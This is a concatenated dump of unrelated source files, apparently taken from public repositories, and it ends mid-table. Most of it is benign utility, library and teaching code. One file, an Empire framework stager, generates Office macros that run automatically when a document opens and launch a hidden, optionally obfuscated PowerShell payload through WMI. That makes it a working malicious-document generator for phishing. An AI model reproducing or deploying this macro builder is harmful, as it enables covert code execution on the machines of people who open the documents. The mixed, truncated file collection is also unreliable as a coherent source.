def timeuntil(d, now=None):
"""
Like timesince, but returns a string measuring the time until
the given time.
"""
if not now:
if getattr(d, 'tzinfo', None):
now = datetime.datetime.now(LocalTimezone(d))
else:
now = datetime.datetime.now()
return timesince(now, d)
| lgpl-3.0 |
wisdark/Empire | lib/stagers/windows/macro.py | 12 | 5939 | from lib.common import helpers
import random, string
class Stager:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Macro',
'Author': ['@enigma0x3', '@harmj0y'],
'Description': ('Generates an office macro for Empire, compatible with office 97-2003, and 2007 file types.'),
'Comments': [
'http://enigma0x3.wordpress.com/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/'
]
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener' : {
'Description' : 'Listener to generate stager for.',
'Required' : True,
'Value' : ''
},
'Language' : {
'Description' : 'Language of the stager to generate.',
'Required' : True,
'Value' : 'powershell'
},
'StagerRetries' : {
'Description' : 'Times for the stager to retry connecting.',
'Required' : False,
'Value' : '0'
},
'OutFile' : {
'Description' : 'File to output macro to, otherwise displayed on the screen.',
'Required' : False,
'Value' : '/tmp/macro'
},
'Obfuscate' : {
'Description' : 'Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.',
'Required' : False,
'Value' : 'False'
},
'ObfuscateCommand' : {
'Description' : 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required' : False,
'Value' : r'Token\All\1,Launcher\STDIN++\12467'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# extract all of our options
language = self.options['Language']['Value']
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
obfuscate = self.options['Obfuscate']['Value']
obfuscateCommand = self.options['ObfuscateCommand']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
stagerRetries = self.options['StagerRetries']['Value']
obfuscateScript = False
if obfuscate.lower() == "true":
obfuscateScript = True
# generate the launcher code
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, obfuscate=obfuscateScript, obfuscationCommand=obfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
Str = ''.join(random.choice(string.letters) for i in range(random.randint(1,len(listenerName))))
Method=''.join(random.choice(string.letters) for i in range(random.randint(1,len(listenerName))))
if launcher == "":
print helpers.color("[!] Error in launcher command generation.")
return ""
else:
chunks = list(helpers.chunks(launcher, 50))
payload = "\tDim "+Str+" As String\n"
payload += "\t"+Str+" = \"" + str(chunks[0]) + "\"\n"
for chunk in chunks[1:]:
payload += "\t"+Str+" = "+Str+" + \"" + str(chunk) + "\"\n"
macro = "Sub Auto_Open()\n"
macro += "\t"+Method+"\n"
macro += "End Sub\n\n"
macro += "Sub AutoOpen()\n"
macro += "\t"+Method+"\n"
macro += "End Sub\n\n"
macro += "Sub Document_Open()\n"
macro += "\t"+Method+"\n"
macro += "End Sub\n\n"
macro += "Public Function "+Method+"() As Variant\n"
macro += payload
macro += "\tConst HIDDEN_WINDOW = 0\n"
macro += "\tstrComputer = \".\"\n"
macro += "\tSet objWMIService = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2\")\n"
macro += "\tSet objStartup = objWMIService.Get(\"Win32_ProcessStartup\")\n"
macro += "\tSet objConfig = objStartup.SpawnInstance_\n"
macro += "\tobjConfig.ShowWindow = HIDDEN_WINDOW\n"
macro += "\tSet objProcess = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2:Win32_Process\")\n"
macro += "\tobjProcess.Create "+Str+", Null, objConfig, intProcessID\n"
macro += "End Function\n"
return macro
| bsd-3-clause |
achang97/YouTunes | lib/python2.7/site-packages/pyasn1/type/constraint.py | 12 | 7801 | #
# This file is part of pyasn1 software.
#
# Copyright (c) 2005-2017, Ilya Etingof <etingof@gmail.com>
# License: http://pyasn1.sf.net/license.html
#
# Original concept and code by Mike C. Fletcher.
#
import sys
from pyasn1.type import error
__all__ = ['SingleValueConstraint', 'ContainedSubtypeConstraint', 'ValueRangeConstraint',
'ValueSizeConstraint', 'PermittedAlphabetConstraint', 'InnerTypeConstraint',
'ConstraintsExclusion', 'ConstraintsIntersection', 'ConstraintsUnion']
class AbstractConstraint(object):
"""Abstract base-class for constraint objects
Constraints should be stored in a simple sequence in the
namespace of their client Asn1Item sub-classes in cases
when ASN.1 constraint is define.
"""
def __init__(self, *values):
self._valueMap = set()
self._setValues(values)
self.__hash = hash((self.__class__.__name__, self._values))
def __call__(self, value, idx=None):
if not self._values:
return
try:
self._testValue(value, idx)
except error.ValueConstraintError:
raise error.ValueConstraintError(
'%s failed at: %r' % (self, sys.exc_info()[1])
)
def __repr__(self):
return '%s(%s)' % (
self.__class__.__name__,
', '.join([repr(x) for x in self._values])
)
def __eq__(self, other):
return self is other and True or self._values == other
def __ne__(self, other):
return self._values != other
def __lt__(self, other):
return self._values < other
def __le__(self, other):
return self._values <= other
def __gt__(self, other):
return self._values > other
def __ge__(self, other):
return self._values >= other
if sys.version_info[0] <= 2:
def __nonzero__(self):
return self._values and True or False
else:
def __bool__(self):
return self._values and True or False
def __hash__(self):
return self.__hash
def _setValues(self, values):
self._values = values
def _testValue(self, value, idx):
raise error.ValueConstraintError(value)
# Constraints derivation logic
def getValueMap(self):
return self._valueMap
def isSuperTypeOf(self, otherConstraint):
# TODO: fix possible comparison of set vs scalars here
return (otherConstraint is self or
not self._values or
otherConstraint == self or
self in otherConstraint.getValueMap())
def isSubTypeOf(self, otherConstraint):
return (otherConstraint is self or
not self or
otherConstraint == self or
otherConstraint in self._valueMap)
class SingleValueConstraint(AbstractConstraint):
"""Value must be part of defined values constraint"""
def _setValues(self, values):
self._values = values
self._set = set(values)
def _testValue(self, value, idx):
if value not in self._set:
raise error.ValueConstraintError(value)
class ContainedSubtypeConstraint(AbstractConstraint):
"""Value must satisfy all of defined set of constraints"""
def _testValue(self, value, idx):
for c in self._values:
c(value, idx)
class ValueRangeConstraint(AbstractConstraint):
"""Value must be within start and stop values (inclusive)"""
def _testValue(self, value, idx):
if value < self.start or value > self.stop:
raise error.ValueConstraintError(value)
def _setValues(self, values):
if len(values) != 2:
raise error.PyAsn1Error(
'%s: bad constraint values' % (self.__class__.__name__,)
)
self.start, self.stop = values
if self.start > self.stop:
raise error.PyAsn1Error(
'%s: screwed constraint values (start > stop): %s > %s' % (
self.__class__.__name__,
self.start, self.stop
)
)
AbstractConstraint._setValues(self, values)
class ValueSizeConstraint(ValueRangeConstraint):
"""len(value) must be within start and stop values (inclusive)"""
def _testValue(self, value, idx):
valueSize = len(value)
if valueSize < self.start or valueSize > self.stop:
raise error.ValueConstraintError(value)
class PermittedAlphabetConstraint(SingleValueConstraint):
def _setValues(self, values):
self._values = values
self._set = set(values)
def _testValue(self, value, idx):
if not self._set.issuperset(value):
raise error.ValueConstraintError(value)
# This is a bit kludgy, meaning two op modes within a single constraint
class InnerTypeConstraint(AbstractConstraint):
"""Value must satisfy type and presense constraints"""
def _testValue(self, value, idx):
if self.__singleTypeConstraint:
self.__singleTypeConstraint(value)
elif self.__multipleTypeConstraint:
if idx not in self.__multipleTypeConstraint:
raise error.ValueConstraintError(value)
constraint, status = self.__multipleTypeConstraint[idx]
if status == 'ABSENT': # XXX presense is not checked!
raise error.ValueConstraintError(value)
constraint(value)
def _setValues(self, values):
self.__multipleTypeConstraint = {}
self.__singleTypeConstraint = None
for v in values:
if isinstance(v, tuple):
self.__multipleTypeConstraint[v[0]] = v[1], v[2]
else:
self.__singleTypeConstraint = v
AbstractConstraint._setValues(self, values)
# Boolean ops on constraints
class ConstraintsExclusion(AbstractConstraint):
"""Value must not fit the single constraint"""
def _testValue(self, value, idx):
try:
self._values[0](value, idx)
except error.ValueConstraintError:
return
else:
raise error.ValueConstraintError(value)
def _setValues(self, values):
if len(values) != 1:
raise error.PyAsn1Error('Single constraint expected')
AbstractConstraint._setValues(self, values)
class AbstractConstraintSet(AbstractConstraint):
"""Value must not satisfy the single constraint"""
def __getitem__(self, idx):
return self._values[idx]
def __iter__(self):
return iter(self._values)
def __add__(self, value):
return self.__class__(*(self._values + (value,)))
def __radd__(self, value):
return self.__class__(*((value,) + self._values))
def __len__(self):
return len(self._values)
# Constraints inclusion in sets
def _setValues(self, values):
self._values = values
for constraint in values:
if constraint:
self._valueMap.add(constraint)
self._valueMap.update(constraint.getValueMap())
class ConstraintsIntersection(AbstractConstraintSet):
"""Value must satisfy all constraints"""
def _testValue(self, value, idx):
for constraint in self._values:
constraint(value, idx)
class ConstraintsUnion(AbstractConstraintSet):
"""Value must satisfy at least one constraint"""
def _testValue(self, value, idx):
for constraint in self._values:
try:
constraint(value, idx)
except error.ValueConstraintError:
pass
else:
return
raise error.ValueConstraintError(
'all of %s failed for \"%s\"' % (self._values, value)
)
# XXX
# add tests for type check
| mit |
benhoff/plugins | listenerplugins/cryptocurrency.py | 2 | 2829 | """
cryptocurrency.py
A plugin that uses the CoinMarketCap JSON API to get values for cryptocurrencies.
Created By:
- Luke Rogers <https://github.com/lukeroge>
Special Thanks:
- https://coinmarketcap-nexuist.rhcloud.com/
License:
GPL v3
"""
import types
from urllib.parse import quote_plus
from datetime import datetime
import re
import requests
from . import ListenerPlugin
API_URL = "https://coinmarketcap-nexuist.rhcloud.com/api/{}"
class Cryptocurrency(ListenerPlugin):
def __init__(self):
super().__init__()
self._bitcoin_matches = [re.compile('bitcoin'), re.compile('btc')]
self._litecoin_matches = [re.compile('litecoin'), re.compile('ltc')]
self._doge_matches = [re.compile('dogecoin'), re.compile('doge')]
self.matches = [re.compile('crypto'), re.compile('cryptocurrency')]
self.matches.extend(self._bitcoin_matches)
self.matches.extend(self._litecoin_matches)
self.matches.extend(self._doge_matches)
def __call__(self, regex_command, string_argument):
if regex_command in self._bitcoin_matches:
result = crypto_command('btc')
elif regex_command in self._doge_matches:
result = crypto_command("doge")
elif regex_command in self._litecoin_matches:
result = crypto_command("ltc")
else:
result = crypto_command(string_argument)
return result
# main command
def crypto_command(text):
""" <ticker> -- Returns current value of a cryptocurrency """
try:
encoded = quote_plus(text)
request = requests.get(API_URL.format(encoded))
request.raise_for_status()
except (requests.exceptions.HTTPError, requests.exceptions.ConnectionError) as e:
return "Could not get value: {}".format(e)
data = request.json()
if "error" in data:
return "{}.".format(data['error'])
updated_time = datetime.fromtimestamp(data['timestamp'])
if (datetime.today() - updated_time).days > 2:
# the API retains data for old ticker names that are no longer updated
# in these cases we just return a "not found" message
return "Currency not found."
change = float(data['change'])
if change > 0:
change_str = "\x033 {}%\x0f".format(change)
elif change < 0:
change_str = "\x035 {}%\x0f".format(change)
else:
change_str = "{}%".format(change)
return "{} // \x0307${:,.2f}\x0f USD - {:,.7f} BTC // {} change".format(data['symbol'].upper(),
float(data['price']['usd']),
float(data['price']['btc']),
change_str)
| gpl-3.0 |
franky88/emperioanimesta | env/Lib/site-packages/pip/_vendor/requests/packages/chardet/compat.py | 2943 | 1157 | ######################## BEGIN LICENSE BLOCK ########################
# Contributor(s):
# Ian Cordasco - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
if sys.version_info < (3, 0):
base_str = (str, unicode)
else:
base_str = (bytes, str)
def wrap_ord(a):
if sys.version_info < (3, 0) and isinstance(a, base_str):
return ord(a)
else:
return a
| gpl-3.0 |
andres-erbsen/dename | utils/dbutil.py | 1 | 1803 | # Copyright 2014 The Dename Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
from math import *
from message_pb2 import *
from google.protobuf import text_format
import plyvel
def pb2str(pb):
return text_format.MessageToString(pb).decode('utf-8')
SignedServerMessage.__str__ = pb2str
SignedServerMessage.ServerMessage.__str__ = pb2str
def varint(*args):
ret = bytes()
for x in args:
while x:
ret += bytes([(x & 0x7f) | (int(x > 0x07f) << 7)])
x >>= 7
return ret
def unvarint(bs):
ret = 0
for byte in reversed(bs):
ret <<= 7
ret |= byte & (0x7f)
return ret
db = plyvel.DB('../server/run')
# list(db.iterator(start=b'M'+varint(1,1), stop=b'M'+varint(1,2)))
ssm = lambda x: SignedServerMessage.FromString(x)
sm = lambda x: SignedServerMessage.ServerMessage.FromString(x)
def SSM(*args):
return [ssm(v) for (k,v) in db.iterator(start=b'M'+varint(*args), stop=b'M'+varint(*(list(args[:-1])+[args[-1]+1])))]
def SM(*args):
return [sm(ssm(v).Message) for (k,v) in db.iterator(start=b'M'+varint(*args), stop=b'M'+varint(*(list(args[:-1])+[args[-1]+1])))]
def O(round):
return SignedServerMessage.ServerMessage.OperationsT.FromString(db.get(b'O'+varint(round)))
def Vround():
return unvarint(db.get(b'Vround'))
| apache-2.0 |
matmodlab/matmodlab2 | matmodlab2/materials/plastic3.py | 1 | 4877 | from numpy import dot, zeros, ix_, sqrt
from ..core.logio import logger
from ..core.material import Material
from ..core.tensor import VOIGT, dyad, deviatoric_part, \
double_dot, magnitude
TOLER = 1e-8
ROOT3, ROOT2 = sqrt(3.), sqrt(2.)
class HardeningPlasticMaterial(Material):
name = "hardening-plastic"
def __init__(self, **parameters):
"""Set up the Plastic material """
param_names = ['E', 'Nu', 'Y0', 'Y1', 'm']
self.params = {}
for (i, name) in enumerate(param_names):
self.params[name] = parameters.pop(name, 0.)
if parameters:
unused = ', '.join(parameters.keys())
logger.warning('Unused parameters: {0}'.format(unused))
# Check inputs
E = self.params['E']
Nu = self.params['Nu']
Y0 = self.params['Y0']
errors = 0
if E <= 0.0:
errors += 1
logger.error("Young's modulus E must be positive")
if Nu > 0.5:
errors += 1
logger.error("Poisson's ratio > .5")
if Nu < -1.0:
errors += 1
logger.error("Poisson's ratio < -1.")
if Nu < 0.0:
logger.warn("#---- WARNING: negative Poisson's ratio")
if Y0 < 0:
errors += 1
logger.error('Yield strength must be positive')
if Y0 < 1e-12:
# zero strength -> assume the user wants elasticity
logger.warning('Zero strength detected, setting it to a larg number')
self.params['Y0'] = 1e60
if errors:
raise ValueError("stopping due to previous errors")
# At this point, the parameters have been checked. Now request
# allocation of solution dependent variables. The only variable
# is the equivalent plastic strain
self.num_sdv = 1
self.sdv_names = ['EP_Equiv']
def Y(self, Y0, Y1, m, eqps):
Y = Y0
if eqps > 1e-12:
Y += Y1 * eqps ** m
return Y
def eval(self, time, dtime, temp, dtemp, F0, F,
stran, d, stress, X, **kwargs):
"""Compute updated stress given strain increment"""
# material properties
Y0 = self.params['Y0']
Y1 = self.params['Y1']
E = self.params['E']
Nu = self.params['Nu']
m = self.params['m']
if m < 1e-10:
# if m = 0, assume linear hardening
m = 1.
eqps = X[0]
# Get the bulk, shear, and Lame constants
K = E / 3. / (1. - 2. * Nu)
G = E / 2. / (1. + Nu)
K3 = 3. * K
G2 = 2. * G
G3 = 3. * G
Lam = (K3 - G2) / 3.
# elastic stiffness
C = zeros((6,6))
C[ix_(range(3), range(3))] = Lam
C[range(3),range(3)] += G2
C[range(3,6),range(3,6)] = G
# Trial stress
de = d * dtime
T = stress + double_dot(C, de)
# check yield
S = deviatoric_part(T)
RTJ2 = magnitude(S) / ROOT2
f = RTJ2 - self.Y(Y0, Y1, m, eqps) / ROOT3
if f <= TOLER:
# Elastic loading, return what we have computed
return T, X, C
# Calculate the flow direction, projection direction
M = S / ROOT2 / RTJ2
N = S / ROOT2 / RTJ2
A = 2 * G * M
# Newton iterations to find Gamma
Gamma = 0
Ttrial = T.copy()
for i in range(20):
# Update all quantities
dfdy = -1. / ROOT3
dydG = ROOT2 / ROOT3 * Y1
hy = ROOT2 / ROOT3 * Y1
if Y1 > 1e-8 and eqps > 1e-8:
hy *= m * ((self.Y(Y0, Y1, m, eqps) - Y0) / Y1) ** ((m - 1.) / m)
dydG *= m * eqps ** (m - 1.)
dGamma = f * ROOT2 / (double_dot(N, A) - dfdy * dydG)
Gamma += dGamma
T = Ttrial - Gamma * A
S = deviatoric_part(T)
RTJ2 = magnitude(S) / ROOT2
eqps += ROOT2 / ROOT3 * dGamma
f = RTJ2 - self.Y(Y0, Y1, m, eqps) / ROOT3
# Calculate the flow direction, projection direction
M = S / ROOT2 / RTJ2
N = S / ROOT2 / RTJ2
A = 2 * G * M
Q = 2 * G * N
if abs(dGamma + 1.) < TOLER + 1.:
break
else:
raise RuntimeError('Newton iterations failed to converge')
# Elastic strain rate and equivalent plastic strain
dT = T - stress
dep = Gamma * M
dee = de - dep
deqp = ROOT2 / ROOT3 * Gamma
# Elastic stiffness
H = -2. * dfdy * hy / ROOT2
D = C - 1 / (double_dot(N, A) + H) * dyad(Q, A)
# Equivalent plastic strain
X[0] += deqp
#print X[0]
#print eqps
#assert abs(X[0] - eqps) + 1 < 1.1e-5, 'Bad plastic strain integration'
return T, X, D
| bsd-3-clause |
olivierdalang/stdm | third_party/sqlalchemy/dialects/mysql/mysqlconnector.py | 1 | 5291 | # mysql/mysqlconnector.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""
.. dialect:: mysql+mysqlconnector
:name: MySQL Connector/Python
:dbapi: myconnpy
:connectstring: mysql+mysqlconnector://<user>:<password>@\
<host>[:<port>]/<dbname>
:url: http://dev.mysql.com/downloads/connector/python/
"""
from .base import (MySQLDialect, MySQLExecutionContext,
MySQLCompiler, MySQLIdentifierPreparer,
BIT)
from ... import util
import re
class MySQLExecutionContext_mysqlconnector(MySQLExecutionContext):
def get_lastrowid(self):
return self.cursor.lastrowid
class MySQLCompiler_mysqlconnector(MySQLCompiler):
def visit_mod_binary(self, binary, operator, **kw):
if self.dialect._mysqlconnector_double_percents:
return self.process(binary.left, **kw) + " %% " + \
self.process(binary.right, **kw)
else:
return self.process(binary.left, **kw) + " % " + \
self.process(binary.right, **kw)
def post_process_text(self, text):
if self.dialect._mysqlconnector_double_percents:
return text.replace('%', '%%')
else:
return text
def escape_literal_column(self, text):
if self.dialect._mysqlconnector_double_percents:
return text.replace('%', '%%')
else:
return text
class MySQLIdentifierPreparer_mysqlconnector(MySQLIdentifierPreparer):
def _escape_identifier(self, value):
value = value.replace(self.escape_quote, self.escape_to_quote)
if self.dialect._mysqlconnector_double_percents:
return value.replace("%", "%%")
else:
return value
class _myconnpyBIT(BIT):
def result_processor(self, dialect, coltype):
"""MySQL-connector already converts mysql bits, so."""
return None
class MySQLDialect_mysqlconnector(MySQLDialect):
driver = 'mysqlconnector'
supports_unicode_binds = True
supports_sane_rowcount = True
supports_sane_multi_rowcount = True
supports_native_decimal = True
default_paramstyle = 'format'
execution_ctx_cls = MySQLExecutionContext_mysqlconnector
statement_compiler = MySQLCompiler_mysqlconnector
preparer = MySQLIdentifierPreparer_mysqlconnector
colspecs = util.update_copy(
MySQLDialect.colspecs,
{
BIT: _myconnpyBIT,
}
)
@util.memoized_property
def supports_unicode_statements(self):
return util.py3k or self._mysqlconnector_version_info > (2, 0)
@classmethod
def dbapi(cls):
from mysql import connector
return connector
def create_connect_args(self, url):
opts = url.translate_connect_args(username='user')
opts.update(url.query)
util.coerce_kw_type(opts, 'buffered', bool)
util.coerce_kw_type(opts, 'raise_on_warnings', bool)
opts.setdefault('buffered', True)
opts.setdefault('raise_on_warnings', True)
# FOUND_ROWS must be set in ClientFlag to enable
# supports_sane_rowcount.
if self.dbapi is not None:
try:
from mysql.connector.constants import ClientFlag
client_flags = opts.get(
'client_flags', ClientFlag.get_default())
client_flags |= ClientFlag.FOUND_ROWS
opts['client_flags'] = client_flags
except:
pass
return [[], opts]
@util.memoized_property
def _mysqlconnector_version_info(self):
if self.dbapi and hasattr(self.dbapi, '__version__'):
m = re.match(r'(\d+)\.(\d+)(?:\.(\d+))?',
self.dbapi.__version__)
if m:
return tuple(
int(x)
for x in m.group(1, 2, 3)
if x is not None)
@util.memoized_property
def _mysqlconnector_double_percents(self):
return not util.py3k and self._mysqlconnector_version_info < (2, 0)
def _get_server_version_info(self, connection):
dbapi_con = connection.connection
version = dbapi_con.get_server_version()
return tuple(version)
def _detect_charset(self, connection):
return connection.connection.charset
def _extract_error_code(self, exception):
return exception.errno
def is_disconnect(self, e, connection, cursor):
errnos = (2006, 2013, 2014, 2045, 2055, 2048)
exceptions = (self.dbapi.OperationalError, self.dbapi.InterfaceError)
if isinstance(e, exceptions):
return e.errno in errnos or \
"MySQL Connection not available." in str(e)
else:
return False
def _compat_fetchall(self, rp, charset=None):
return rp.fetchall()
def _compat_fetchone(self, rp, charset=None):
return rp.fetchone()
dialect = MySQLDialect_mysqlconnector
| gpl-2.0 |
DylannCordel/pybbm | pybb/migrations/0003_slugs_fill.py | 7 | 1365 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from pybb.models import create_or_check_slug
def fill_slugs(apps, schema_editor):
Category = apps.get_model("pybb", "Category")
Forum = apps.get_model("pybb", "Forum")
Topic = apps.get_model("pybb", "Topic")
for category in Category.objects.all():
category.slug = create_or_check_slug(instance=category, model=Category)
category.save()
for forum in Forum.objects.all():
extra_filters = {'category': forum.category}
forum.slug = create_or_check_slug(instance=forum, model=Forum, **extra_filters)
forum.save()
for topic in Topic.objects.all():
extra_filters = {'forum': topic.forum}
topic.slug = create_or_check_slug(instance=topic, model=Topic, **extra_filters)
topic.save()
def clear_slugs(apps, schema_editor):
Category = apps.get_model("pybb", "Category")
Forum = apps.get_model("pybb", "Forum")
Topic = apps.get_model("pybb", "Topic")
Category.objects.all().update(slug='')
Forum.objects.all().update(slug='')
Topic.objects.all().update(slug='')
class Migration(migrations.Migration):
dependencies = [
('pybb', '0002_slugs_optional'),
]
operations = [
migrations.RunPython(fill_slugs, clear_slugs),
]
| bsd-2-clause |
ASMlover/study | reading-notes/CorePython/src/time_srv.py | 1 | 1886 | # Copyright (c) 2014 ASMlover. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list ofconditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materialsprovided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
from socket import *
from time import ctime
HOST = ''
PORT = 6666
BUFSIZE = 1024
ADDR = (HOST, PORT)
tcpSrvSock = socket(AF_INET, SOCK_STREAM)
tcpSrvSock.bind(ADDR)
tcpSrvSock.listen(5)
while True:
print 'waiting for connection ...'
tcpCltSock, addr = tcpSrvSock.accept()
print '...connection from:', addr
while True:
data = tcpCltSock.recv(BUFSIZE)
if not data:
break
tcpCltSock.send('[%s] %s' % (ctime(), data))
tcpCltSock.close()
tcpSrvSock.close()
| bsd-2-clause |
hohoins/ml | hunkim/ml_lab_05.py | 1 | 1187 | # 참고자료
# 모두를 위한 머신러닝/딥러닝 강의
# 홍콩과기대 김성훈
# http://hunkim.github.io/ml
import tensorflow as tf
import numpy as np
# Data
xy = np.loadtxt('ml_lab_05.txt', unpack=True, dtype='float32')
x_data = xy[0:-1]
y_data = xy[-1]
X = tf.placeholder(tf.float32)
Y = tf.placeholder(tf.float32)
# variable
W = tf.Variable(tf.random_uniform([1, 3], -1.0, 1.0))
# Hypothesis
h = tf.matmul(W, X)
hypothesis = tf.div(1.0, 1.0 + tf.exp(-h))
# Cost
cost = -tf.reduce_mean(Y*tf.log(hypothesis) + (1-Y)*tf.log(1-hypothesis))
# Gradient descent algorithm
a = tf.Variable(0.1)
optimizer = tf.train.GradientDescentOptimizer(a)
train = optimizer.minimize(cost)
# init
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
# Train
for step in range(2001):
sess.run(train, feed_dict={X: x_data, Y: y_data})
if step % 20 == 0:
print(step, sess.run(cost, feed_dict={X: x_data, Y: y_data}), sess.run(W))
# predict
print(sess.run(hypothesis, feed_dict={X: [[1], [2], [2]]}) > 0.5)
print(sess.run(hypothesis, feed_dict={X: [[1], [5], [5]]}) > 0.5)
print(sess.run(hypothesis, feed_dict={X: [[1, 1], [4, 3], [3, 5]]}) > 0.5)
| apache-2.0 |
TNT-Samuel/Coding-Projects | DNS Server/Source/Lib/encodings/iso8859_3.py | 272 | 13089 | """ Python Character Mapping Codec iso8859_3 generated from 'MAPPINGS/ISO8859/8859-3.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_table)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='iso8859-3',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Table
decoding_table = (
'\x00' # 0x00 -> NULL
'\x01' # 0x01 -> START OF HEADING
'\x02' # 0x02 -> START OF TEXT
'\x03' # 0x03 -> END OF TEXT
'\x04' # 0x04 -> END OF TRANSMISSION
'\x05' # 0x05 -> ENQUIRY
'\x06' # 0x06 -> ACKNOWLEDGE
'\x07' # 0x07 -> BELL
'\x08' # 0x08 -> BACKSPACE
'\t' # 0x09 -> HORIZONTAL TABULATION
'\n' # 0x0A -> LINE FEED
'\x0b' # 0x0B -> VERTICAL TABULATION
'\x0c' # 0x0C -> FORM FEED
'\r' # 0x0D -> CARRIAGE RETURN
'\x0e' # 0x0E -> SHIFT OUT
'\x0f' # 0x0F -> SHIFT IN
'\x10' # 0x10 -> DATA LINK ESCAPE
'\x11' # 0x11 -> DEVICE CONTROL ONE
'\x12' # 0x12 -> DEVICE CONTROL TWO
'\x13' # 0x13 -> DEVICE CONTROL THREE
'\x14' # 0x14 -> DEVICE CONTROL FOUR
'\x15' # 0x15 -> NEGATIVE ACKNOWLEDGE
'\x16' # 0x16 -> SYNCHRONOUS IDLE
'\x17' # 0x17 -> END OF TRANSMISSION BLOCK
'\x18' # 0x18 -> CANCEL
'\x19' # 0x19 -> END OF MEDIUM
'\x1a' # 0x1A -> SUBSTITUTE
'\x1b' # 0x1B -> ESCAPE
'\x1c' # 0x1C -> FILE SEPARATOR
'\x1d' # 0x1D -> GROUP SEPARATOR
'\x1e' # 0x1E -> RECORD SEPARATOR
'\x1f' # 0x1F -> UNIT SEPARATOR
' ' # 0x20 -> SPACE
'!' # 0x21 -> EXCLAMATION MARK
'"' # 0x22 -> QUOTATION MARK
'#' # 0x23 -> NUMBER SIGN
'$' # 0x24 -> DOLLAR SIGN
'%' # 0x25 -> PERCENT SIGN
'&' # 0x26 -> AMPERSAND
"'" # 0x27 -> APOSTROPHE
'(' # 0x28 -> LEFT PARENTHESIS
')' # 0x29 -> RIGHT PARENTHESIS
'*' # 0x2A -> ASTERISK
'+' # 0x2B -> PLUS SIGN
',' # 0x2C -> COMMA
